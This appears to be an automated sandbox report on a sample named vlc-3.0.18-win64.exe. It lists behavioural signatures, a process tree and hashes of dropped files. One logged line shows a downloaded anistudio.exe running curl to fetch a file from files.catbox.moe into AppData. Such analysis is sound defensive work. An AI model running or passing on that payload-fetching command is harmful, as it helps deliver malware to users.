Analysis

  • max time kernel
    159s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-04-2023 01:10

General

  • Target

    vlc-3.0.18-win64.exe

  • Size

    42.2MB

  • MD5

    7fddbac28a9c85c79fe08e2d6506e535

  • SHA1

    b2def381b57b9a7643a91790f5537e74fab729dc

  • SHA256

    ba575f153d357eaf3fdbf446b9b93a12ced87c35887cdd83ad4281733eb86602

  • SHA512

    bfbda8c590dc53d565cc2d26a59c97834663e871c6c7233523a2dd48027e78b93c75ae8af6d56c8542c9102aadbee8aa3b5c7f83a7600b377cf0af2cc92433b9

  • SSDEEP

    786432:5+vk5XxMOrNfNWNG7JNzwCR3xmgpa3qdxrXcAPXCIfJ546BZTg2QrXoRHq:5+vyTnJFwL3qrJvCIxi6By2QrXoE

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 7 IoCs
  • Detects Pyinstaller 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\vlc-3.0.18-win64.exe
    "C:\Users\Admin\AppData\Local\Temp\vlc-3.0.18-win64.exe"
    1⤵
    • Loads dropped DLL
    PID:3368
  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3768
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      2⤵
      • Checks processor information in registry
      • Modifies registry class
      • NTFS ADS
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4724
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4724.0.1098193297\269862191" -parentBuildID 20221007134813 -prefsHandle 1848 -prefMapHandle 1840 -prefsLen 20812 -prefMapSize 232645 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9af8c941-1cdd-4b3f-a328-5aba684243dd} 4724 "\\.\pipe\gecko-crash-server-pipe.4724" 1916 227e20e9b58 gpu
        3⤵
          PID:4708
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4724.1.380687668\72732667" -parentBuildID 20221007134813 -prefsHandle 2304 -prefMapHandle 2300 -prefsLen 20848 -prefMapSize 232645 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {59c050c3-b0a3-4c84-ac56-c4ae45b186f0} 4724 "\\.\pipe\gecko-crash-server-pipe.4724" 2316 227d526fb58 socket
          3⤵
            PID:4904
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4724.2.150548894\973243489" -childID 1 -isForBrowser -prefsHandle 3060 -prefMapHandle 3056 -prefsLen 20931 -prefMapSize 232645 -jsInitHandle 1464 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dfe8ba8-68f8-4d81-8e81-e8e6e9bf012d} 4724 "\\.\pipe\gecko-crash-server-pipe.4724" 3068 227e5dadb58 tab
            3⤵
              PID:5064
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4724.3.1175275720\498705929" -childID 2 -isForBrowser -prefsHandle 1436 -prefMapHandle 2464 -prefsLen 26441 -prefMapSize 232645 -jsInitHandle 1464 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a7c4f53-0bf2-4126-b76b-6d86d1854632} 4724 "\\.\pipe\gecko-crash-server-pipe.4724" 3484 227e4a98b58 tab
              3⤵
                PID:4664
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4724.4.737722511\758477501" -childID 3 -isForBrowser -prefsHandle 4148 -prefMapHandle 4144 -prefsLen 26441 -prefMapSize 232645 -jsInitHandle 1464 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ca30ba5-a512-4f91-93e6-5205a627475a} 4724 "\\.\pipe\gecko-crash-server-pipe.4724" 4112 227e7184658 tab
                3⤵
                  PID:3556
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4724.5.812502616\831704389" -childID 4 -isForBrowser -prefsHandle 4668 -prefMapHandle 4716 -prefsLen 26500 -prefMapSize 232645 -jsInitHandle 1464 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7a8ad1f-b974-47fe-8585-a8b25c3b509e} 4724 "\\.\pipe\gecko-crash-server-pipe.4724" 4688 227e82f5f58 tab
                  3⤵
                    PID:5108
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4724.7.135300831\679543631" -childID 6 -isForBrowser -prefsHandle 5260 -prefMapHandle 5264 -prefsLen 26500 -prefMapSize 232645 -jsInitHandle 1464 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5611de99-7f3f-4c98-bc0b-dd5d0e29950c} 4724 "\\.\pipe\gecko-crash-server-pipe.4724" 5252 227e898c558 tab
                    3⤵
                      PID:1892
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4724.6.1340535693\1522990575" -childID 5 -isForBrowser -prefsHandle 5068 -prefMapHandle 5072 -prefsLen 26500 -prefMapSize 232645 -jsInitHandle 1464 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3dde96f-4576-4b4d-ad36-d7c7428930b1} 4724 "\\.\pipe\gecko-crash-server-pipe.4724" 5056 227e82f6858 tab
                      3⤵
                        PID:4472
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4724.8.731804111\407903578" -childID 7 -isForBrowser -prefsHandle 3708 -prefMapHandle 5544 -prefsLen 30142 -prefMapSize 232645 -jsInitHandle 1464 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba0a5a5a-f1f7-4fb7-9a5b-5bd9ce134390} 4724 "\\.\pipe\gecko-crash-server-pipe.4724" 4520 227eafe1f58 tab
                        3⤵
                          PID:5052
                        • C:\Users\Admin\Downloads\anistudio.exe
                          "C:\Users\Admin\Downloads\anistudio.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:3520
                          • C:\Users\Admin\Downloads\anistudio.exe
                            "C:\Users\Admin\Downloads\anistudio.exe"
                            4⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            PID:4824
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c curl -o C:\Users\Admin\AppData\Local\Example\daddy.mov https://files.catbox.moe/gxyqdi.mov
                              5⤵
                                PID:2032
                                • C:\Windows\system32\curl.exe
                                  curl -o C:\Users\Admin\AppData\Local\Example\daddy.mov https://files.catbox.moe/gxyqdi.mov
                                  6⤵
                                    PID:3620
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x2f8 0x2ec
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2796

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Example\daddy.mov
                          Filesize

                          2.0MB

                          MD5

                          a7e548d684b1c3efe83ee255f6e99f8f

                          SHA1

                          2550d0940389f05c2e8887bdb92158ff5eaa5eea

                          SHA256

                          9ae72e82da6ae35e1ec212c1b29537b576ab8205ef4883d6c72ba17f7d6f2465

                          SHA512

                          e4c324ce2d8c9a6664c4470666410797bd0c9c0f8a4f72d166438ef755fe1de5fd924bd2e9c1352422de526ca213bec515e298b9496f7877504c1206d1f6d724

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jesyn8dv.default-release\activity-stream.discovery_stream.json.tmp
                          Filesize

                          140KB

                          MD5

                          817187201a6ba5c6b81d814e0559de21

                          SHA1

                          9a627979ee0b3d2541eed5c49f8d7d0db5b1dd63

                          SHA256

                          9f8f0664fbd58fad517aa2d0d6eeb7f6c986405ffc3b859a97816f675348633f

                          SHA512

                          ccf30ec44960e85cba3b70f94796f5f7021e094024a2db8516f787a05f76b5dc53ea1804623ae216ff022a9f5f6bb4a3f4c461b8493ffca6e6f498eedc2f076e

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jesyn8dv.default-release\cache2\doomed\11844
                          Filesize

                          21KB

                          MD5

                          92f9ad8d5223a0f6712c6ea5f9840dac

                          SHA1

                          d3c23d5800c673833ec694961e6c86ccde6c1dc0

                          SHA256

                          a3bea9c0774a60762331647aa3b5d68793df4fa3cbf4fde5783c72710ef66057

                          SHA512

                          1e6b0b3079ce100ec7a907cd87795a901be1bcf753c19911823cb5e295a5fc123985667bf44de428ebde13fa988782f4bc14eac9efae4af81eab3098476101c6

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jesyn8dv.default-release\cache2\doomed\9579
                          Filesize

                          86KB

                          MD5

                          ac0179e1dfe1ee75fbb587838cf76bd1

                          SHA1

                          c590d01b0ac6e5c6139a1e81f2fa67bbd4f8281e

                          SHA256

                          ee4ed74df3d79fe9e6215ececd69510f34d10d89793ae6ce30507f85419f6f98

                          SHA512

                          9bb00d60c4475a92e0119b7c795a5d4c48b55c78264d9a6252b9c4e60858e7acc7e9964d53f8ef25dfd055c06fb64c72453cf0881123ac134ecc03c90c96cf61

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jesyn8dv.default-release\cache2\entries\A4BC0C99327D7691FF360F07D11373B5791EB30C
                          Filesize

                          14KB

                          MD5

                          8714c526f13dc233f724f5ffeeea3a76

                          SHA1

                          18c0bf73d93e450897cd3ab03e6bbb61a07e58f2

                          SHA256

                          6c425da816af0673d5fe85b7cfebba820559a68644a1093f4b7b282effc087ff

                          SHA512

                          587152967fa6cc31f0de770fdc0653c8f71ebb45a5b4f60f3d12fb1aaddf1ae0da5b73e9717d8cd3dd9177ca39ac974b1987d861c8e35ef3b391b596af80c978

                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\_bz2.pyd
                          Filesize

                          81KB

                          MD5

                          bbe89cf70b64f38c67b7bf23c0ea8a48

                          SHA1

                          44577016e9c7b463a79b966b67c3ecc868957470

                          SHA256

                          775fbc6e9a4c7e9710205157350f3d6141b5a9e8f44cb07b3eac38f2789c8723

                          SHA512

                          3ee72ba60541116bbca1a62db64074276d40ad8ed7d0ca199a9c51d65c3f0762a8ef6d0e1e9ebf04bf4efe1347f120e4bc3d502dd288339b4df646a59aad0ec1

                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\_bz2.pyd
                          Filesize

                          81KB

                          MD5

                          bbe89cf70b64f38c67b7bf23c0ea8a48

                          SHA1

                          44577016e9c7b463a79b966b67c3ecc868957470

                          SHA256

                          775fbc6e9a4c7e9710205157350f3d6141b5a9e8f44cb07b3eac38f2789c8723

                          SHA512

                          3ee72ba60541116bbca1a62db64074276d40ad8ed7d0ca199a9c51d65c3f0762a8ef6d0e1e9ebf04bf4efe1347f120e4bc3d502dd288339b4df646a59aad0ec1

                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\_ctypes.pyd
                          Filesize

                          119KB

                          MD5

                          ca4cef051737b0e4e56b7d597238df94

                          SHA1

                          583df3f7ecade0252fdff608eb969439956f5c4a

                          SHA256

                          e60a2b100c4fa50b0b144cf825fe3cde21a8b7b60b92bfc326cb39573ce96b2b

                          SHA512

                          17103d6b5fa84156055e60f9e5756ffc31584cdb6274c686a136291c58ba0be00238d501f8acc1f1ca7e1a1fadcb0c7fefddcb98cedb9dd04325314f7e905df3

                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\_ctypes.pyd
                          Filesize

                          119KB

                          MD5

                          ca4cef051737b0e4e56b7d597238df94

                          SHA1

                          583df3f7ecade0252fdff608eb969439956f5c4a

                          SHA256

                          e60a2b100c4fa50b0b144cf825fe3cde21a8b7b60b92bfc326cb39573ce96b2b

                          SHA512

                          17103d6b5fa84156055e60f9e5756ffc31584cdb6274c686a136291c58ba0be00238d501f8acc1f1ca7e1a1fadcb0c7fefddcb98cedb9dd04325314f7e905df3

                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\_lzma.pyd
                          Filesize

                          153KB

                          MD5

                          0a94c9f3d7728cf96326db3ab3646d40

                          SHA1

                          8081df1dca4a8520604e134672c4be79eb202d14

                          SHA256

                          0a70e8546fa6038029f2a3764e721ceebea415818e5f0df6b90d6a40788c3b31

                          SHA512

                          6f047f3bdaead121018623f52a35f7e8b38c58d3a9cb672e8056a5274d02395188975de08cabae948e2cc2c1ca01c74ca7bc1b82e2c23d652e952f3745491087

                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\_lzma.pyd
                          Filesize

                          153KB

                          MD5

                          0a94c9f3d7728cf96326db3ab3646d40

                          SHA1

                          8081df1dca4a8520604e134672c4be79eb202d14

                          SHA256

                          0a70e8546fa6038029f2a3764e721ceebea415818e5f0df6b90d6a40788c3b31

                          SHA512

                          6f047f3bdaead121018623f52a35f7e8b38c58d3a9cb672e8056a5274d02395188975de08cabae948e2cc2c1ca01c74ca7bc1b82e2c23d652e952f3745491087

                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\base_library.zip
                          Filesize

                          1.0MB

                          MD5

                          1b3a35aff85e16068d0d9e47e15d14ef

                          SHA1

                          a5aa141009ec532e3a631793e23bc25688a79f58

                          SHA256

                          b5ab66813ad84da3954c3041545676a3920271023b1faeb0e8ca42b67643a6d3

                          SHA512

                          d421c89c7d3deaef2c7bf458081dfcb443a0cf33f36ec928a5323144da4fa44ec114fe693404c6fb4b628923539c2de8b7f3aab9bc507dcbf20394d6fa9e21c0

                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\libffi-7.dll
                          Filesize

                          32KB

                          MD5

                          eef7981412be8ea459064d3090f4b3aa

                          SHA1

                          c60da4830ce27afc234b3c3014c583f7f0a5a925

                          SHA256

                          f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

                          SHA512

                          dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\libffi-7.dll
                          Filesize

                          32KB

                          MD5

                          eef7981412be8ea459064d3090f4b3aa

                          SHA1

                          c60da4830ce27afc234b3c3014c583f7f0a5a925

                          SHA256

                          f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

                          SHA512

                          dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\python310.dll
                          Filesize

                          4.3MB

                          MD5

                          deaf0c0cc3369363b800d2e8e756a402

                          SHA1

                          3085778735dd8badad4e39df688139f4eed5f954

                          SHA256

                          156cf2b64dd0f4d9bdb346b654a11300d6e9e15a65ef69089923dafc1c71e33d

                          SHA512

                          5cac1d92af7ee18425b5ee8e7cd4e941a9ddffb4bc1c12bb8aeabeed09acec1ff0309abc41a2e0c8db101fee40724f8bfb27a78898128f8746c8fe01c1631989

                        • C:\Users\Admin\AppData\Local\Temp\_MEI35202\python310.dll
                          Filesize

                          4.3MB

                          MD5

                          deaf0c0cc3369363b800d2e8e756a402

                          SHA1

                          3085778735dd8badad4e39df688139f4eed5f954

                          SHA256

                          156cf2b64dd0f4d9bdb346b654a11300d6e9e15a65ef69089923dafc1c71e33d

                          SHA512

                          5cac1d92af7ee18425b5ee8e7cd4e941a9ddffb4bc1c12bb8aeabeed09acec1ff0309abc41a2e0c8db101fee40724f8bfb27a78898128f8746c8fe01c1631989

                        • C:\Users\Admin\AppData\Local\Temp\nstB78F.tmp\LangDLL.dll
                          Filesize

                          7KB

                          MD5

                          20850d4d5416fbfd6a02e8a120f360fc

                          SHA1

                          ac34f3a34aaa4a21efd6a32bc93102639170e219

                          SHA256

                          860b409b065b747aab2a9937f02d08b6fd7309993b50d8e4b53983c8c2b56b61

                          SHA512

                          c8048b9ae0ced72a384c5ab781083a76b96ae08d5c8a5c7797f75a7e54e9cd9192349f185ee88c9cf0514fc8d59e37e01d88b9c8106321c0581659ebe1d1c276

                        • C:\Users\Admin\AppData\Local\Temp\nstB78F.tmp\System.dll
                          Filesize

                          26KB

                          MD5

                          4f25d99bf1375fe5e61b037b2616695d

                          SHA1

                          958fad0e54df0736ddab28ff6cb93e6ed580c862

                          SHA256

                          803931797d95777248dee4f2a563aed51fe931d2dd28faec507c69ed0f26f647

                          SHA512

                          96a8446f322cd62377a93d2088c0ce06087da27ef95a391e02c505fb4eb1d00419143d67d89494c2ef6f57ae2fd7f049c86e00858d1b193ec6dde4d0fe0e3130

                        • C:\Users\Admin\AppData\Local\Temp\tmpaddon
                          Filesize

                          442KB

                          MD5

                          85430baed3398695717b0263807cf97c

                          SHA1

                          fffbee923cea216f50fce5d54219a188a5100f41

                          SHA256

                          a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                          SHA512

                          06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                        • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
                          Filesize

                          8.0MB

                          MD5

                          a01c5ecd6108350ae23d2cddf0e77c17

                          SHA1

                          c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                          SHA256

                          345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                          SHA512

                          b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
                          Filesize

                          997KB

                          MD5

                          fe3355639648c417e8307c6d051e3e37

                          SHA1

                          f54602d4b4778da21bc97c7238fc66aa68c8ee34

                          SHA256

                          1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                          SHA512

                          8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
                          Filesize

                          116B

                          MD5

                          3d33cdc0b3d281e67dd52e14435dd04f

                          SHA1

                          4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                          SHA256

                          f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                          SHA512

                          a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
                          Filesize

                          479B

                          MD5

                          49ddb419d96dceb9069018535fb2e2fc

                          SHA1

                          62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                          SHA256

                          2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                          SHA512

                          48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
                          Filesize

                          372B

                          MD5

                          8be33af717bb1b67fbd61c3f4b807e9e

                          SHA1

                          7cf17656d174d951957ff36810e874a134dd49e0

                          SHA256

                          e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

                          SHA512

                          6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
                          Filesize

                          11.8MB

                          MD5

                          33bf7b0439480effb9fb212efce87b13

                          SHA1

                          cee50f2745edc6dc291887b6075ca64d716f495a

                          SHA256

                          8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

                          SHA512

                          d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
                          Filesize

                          1KB

                          MD5

                          688bed3676d2104e7f17ae1cd2c59404

                          SHA1

                          952b2cdf783ac72fcb98338723e9afd38d47ad8e

                          SHA256

                          33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                          SHA512

                          7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
                          Filesize

                          1KB

                          MD5

                          937326fead5fd401f6cca9118bd9ade9

                          SHA1

                          4526a57d4ae14ed29b37632c72aef3c408189d91

                          SHA256

                          68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

                          SHA512

                          b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\prefs-1.js
                          Filesize

                          6KB

                          MD5

                          e945c47cb0365b7fb55e6e1ed89bfc5d

                          SHA1

                          f53371386e864c9a42f0f4199cd23a5c60df12d6

                          SHA256

                          74889e95b6bfcceb914d285508d515a17113372d27f1068618de08ac80e33cf6

                          SHA512

                          8d860570a2e69cba75ef5711aa6698006c0c6d74094be86568b23f77bd0e7af68d98e4d03de6de9a88b5729a94303138395069c87a98b944ee709bd70fd717fb

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\prefs-1.js
                          Filesize

                          6KB

                          MD5

                          806f1b3dfa2c05f431a87cd53590cf2b

                          SHA1

                          c6ad1dde516636e9ccf1c9aac42c83d06d2215df

                          SHA256

                          887276d39fb97cebc459ce107367f9dc8a706e3a7351e796643fb3a4d94c52f7

                          SHA512

                          bbe43ac7a9d9539faa0c59a498dd0d64a59b8efc7a7ee9333f7e3a81ae2e6b52c0ea475809042d5e508c0d513156a43978cb356c27478c11d585b695a98f28f3

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\prefs-1.js
                          Filesize

                          7KB

                          MD5

                          1aa3d48c666b64a843aab83cfb92d845

                          SHA1

                          506240eeff91f021814a6591e8fa15204860ca1c

                          SHA256

                          c35c009bf4ec016843a20c29da0dded11870d95ba58a5dc7126b9c12ef985e12

                          SHA512

                          99a09fecf2047ca30d885f40af31f8e23ffd85f8aaa97c624da1957460a197564edf2096db075220d59da0dd7f226a806d0b94b12292d5bdf52610a8a03a9812

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\prefs-1.js
                          Filesize

                          9KB

                          MD5

                          3ee1fd00f91145c0c9dbb575213b08a8

                          SHA1

                          717178bcf5f21cfb9bcfffa206e54a7ad4013e93

                          SHA256

                          43b28344fda7e7d9cbf79fd0bd228320e625c36be97380824fd7e7564bc1233f

                          SHA512

                          9e4e8cc7ff6becbda9a538e987b9e2bf3a8c7a6e6c7867e2f5ac344b301e3ce9e23f6f71aff43abe35e42eef0d31fa423d5c57e85e8011c2fd3634b1a1283d34

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\prefs-1.js
                          Filesize

                          10KB

                          MD5

                          dcbe6b629e7701f0644d1a05706c2bbf

                          SHA1

                          39941ebc51b481bff482fe2a1ac0315e6f180471

                          SHA256

                          c786a3e10507abaee9ac080ee9a840e3d6402b3d4bcaca77a9c7537ceb473679

                          SHA512

                          c6c833e2c96cca7963015b2df21a3f284db5555d9bc9a6e63e2af22e6d5cc88547564aa5c419256ea4f09f4b6abfa443a595cf7b7f6d247ecbc58d89722b4a71

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\prefs-1.js
                          Filesize

                          10KB

                          MD5

                          278b1f003686d5c630919c802bb5632d

                          SHA1

                          77ef60694c498ac998cbd16b4f9e9e2a9569be2f

                          SHA256

                          c53acbaf45ecbf047c11cff6e174bc89958b2709877e868213fdd99efcc0af3d

                          SHA512

                          fa4cc12af08721cd754e65e1d6907de8aa825334c4498c6a665785dddc287b84c8acaf1e01e544a7875546e2f81c82add7f78b1f036727e2ea4e4c644af2be2a

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\prefs.js
                          Filesize

                          6KB

                          MD5

                          9971fa8fa89a208685d3e30835832fb5

                          SHA1

                          5d9972a3bdbd4c18b3648597d2fd9f9fd6e30300

                          SHA256

                          13417a67a65fecc73ad5acc94d17d8a6fac3b0a343daf12d1cd2d126b9198084

                          SHA512

                          02b107e0d9449fa2d4d3655a880fbdeea4477205fa6c21aaf641c3d358353aa437cf040ec842107f973253bef767e48b9a0267dea5ed2d331aa192ef540e3b1f

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\sessionstore-backups\recovery.jsonlz4
                          Filesize

                          6KB

                          MD5

                          2450085b96b0f741490d592aadc41cc5

                          SHA1

                          6b96d4c5d4cd25f9ba30f62909cd5dce4ffe2579

                          SHA256

                          ba6aa97ac39e0368fbded7ebbfcfba337767886c3ec747e01d41bc16d79edde0

                          SHA512

                          35f2d14d967743af7c7a44aa0bfdcaf5eba31c3cc69ebc4363fa92c9cf39d4cdd59bb80417072e615d275ba2295ecbf056f8a4e722f5c25ded84aa83fa049727

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\sessionstore-backups\recovery.jsonlz4
                          Filesize

                          1KB

                          MD5

                          3ff7392c21baa33baf91ec11f9e3e53f

                          SHA1

                          4dd1a89a5f2061a70510c460fb8375984d1b0b21

                          SHA256

                          4fe65603681fb5449d06925b0478946ed085b20abd32ab454569dac5a1512f22

                          SHA512

                          d7911fdfb84062c40aa2c8e4539f843a5604ab36bf1a2bbff11286bf1d2ad8fd3b5f215278aabb0ecc63d08243478ee44ef54e91b53d18687f26e8a8ef8ec2b5

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jesyn8dv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                          Filesize

                          1.3MB

                          MD5

                          ca100b2fbbff3d45dbc42376f99f3873

                          SHA1

                          aee2f21d6111e290e51772b6fc8c1be1d1f8cab4

                          SHA256

                          cdac4e8ff208a4aefac6620fccccf16046103dfc631f28e17960ba246e54968f

                          SHA512

                          ff32ee9616c2a1ef34f05e7d5261f48809753c3a7452177344e720c19a0e4af848459d8ca95e963fdf24d7bc52df31ae164bdeb1051137ca394e0259fd3e8e8d

                        • C:\Users\Admin\Downloads\anistudio.6R2P8DIQ.exe.part
                          Filesize

                          144KB

                          MD5

